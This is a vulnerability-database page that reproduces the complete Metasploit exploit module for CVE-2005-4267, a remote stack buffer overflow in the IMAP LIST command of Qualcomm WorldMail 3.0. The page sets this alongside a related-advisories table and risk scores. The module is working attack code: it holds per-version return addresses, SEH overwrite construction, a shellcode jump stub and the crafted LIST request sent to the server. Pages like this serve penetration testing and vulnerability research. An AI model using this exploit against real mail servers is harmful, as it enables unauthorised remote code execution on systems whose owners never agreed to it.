Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Eudora Qualcomm WorldMail 3.0 - IMAPd 'LIST' Remote Buffer Overflow (Metasploit)

🗓️ 01 Jul 2010 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 442 Views

Qualcomm WorldMail 3.0 IMAP Server Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus		WorldMail IMAP Server Directory Traversal Arbitrary Spool Access
17 Nov 200500:00
nessus
Tenable Nessus		Qualcomm WorldMail Multiple IMAP Command Remote Overflow
20 Dec 200500:00
nessus
Circl		CVE-2005-4267
1 Jul 201000:00
circl
Check Point Advisories		Qualcomm WorldMail IMAP Literal Token Parsing Buffer Overflow (CVE-2005-4267)
5 Nov 200900:00
checkpoint_advisories
Check Point Advisories		IMAP Servers LIST Command Buffer Overflow (CVE-2005-4267)
10 Aug 200600:00
checkpoint_advisories
CVE		CVE-2005-4267
21 Dec 200511:00
cve
Cvelist		CVE-2005-4267
21 Dec 200511:00
cvelist
Metasploit		Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
25 Oct 200622:03
metasploit
NVD		CVE-2005-4267
21 Dec 200511:03
nvd
OpenVAS		Eudora WorldMail IMAP Server Buffer Overflow Vulnerability
18 Jan 201200:00
openvas
Rows per page
##
# $Id: eudora_list.rb 9653 2010-07-01 23:33:07Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Imap
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server
				version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this
				particular vulnerability.

				NOTE: The service does NOT restart automatically by default. You may be limited to
				only one attempt, so choose wisely!
			},
			'Author'         => [ 'MC', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9653 $',
			'References'     =>
				[
					[ 'CVE', '2005-4267'],
					[ 'OSVDB', '22097'],
					[ 'BID', '15980'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 750,
					'BadChars' => "\x00\x0a\x0d\x20\x7b",
					'StackAdustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
					[ 'WorldMail 3 Version 6.1.19.0',   { 'Ret' => 0x600b6317 } ], # p/p/r in MLstMgr.dll v6.1.19.0
					[ 'WorldMail 3 Version 6.1.20.0',   { 'Ret' => 0x10022187 } ], # p/p/r in msremote.dll ?
					[ 'WorldMail 3 Version 6.1.22.0',   { 'Ret' => 0x10022187 } ], # p/p/r in MsRemote.dll v6.1.22.0
				],
			'DisclosureDate' => 'Dec 20 2005',
			'DefaultTarget' => 0))
	end

	def check
		targ = auto_target
		disconnect

		return Exploit::CheckCode::Vulnerable if (targ)
		return Exploit::CheckCode::Safe
	end

	def auto_target
		connect

		if (banner and banner =~ /WorldMail/ and banner =~ /IMAP4 Server (.*) ready/)
			version = $1
			ver = version.split('.')
			if (ver.length == 4)
				major = ver[0].to_i
				minor = ver[1].to_i
				rev = ver[2].to_i
				build = ver[3].to_i
				if (major == 6 and minor == 1)
					return targets[1] if (rev == 19)
					return targets[2] if (rev == 20)
					return targets[3] if (rev == 22)
				end
			end
		end

		# no target found
		nil
	end

	def exploit
		if (target_index == 0)
			mytarget = auto_target
			if mytarget
				print_status("Automatically detected \"#{mytarget.name}\" ...")
			else
				raise RuntimeError, 'Unable to automatically detect a target'
			end
		else
			mytarget = target
			connect
		end

		jmp =  "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
		jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
		jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

		sploit =  "a001 LIST " + rand_text_alphanumeric(20)
		sploit << payload.encoded
		sploit << generate_seh_record(mytarget.ret)
		sploit << make_nops(8) + jmp + rand_text_alphanumeric(40)
		sploit << "}" + "\r\n"

		sock.put(sploit)

		handler
		disconnect
	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2010 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
EPSS0.75444
qualcomm worldmailimap serverbuffer overflowremoteexploitvulnerabilitymetasploit
442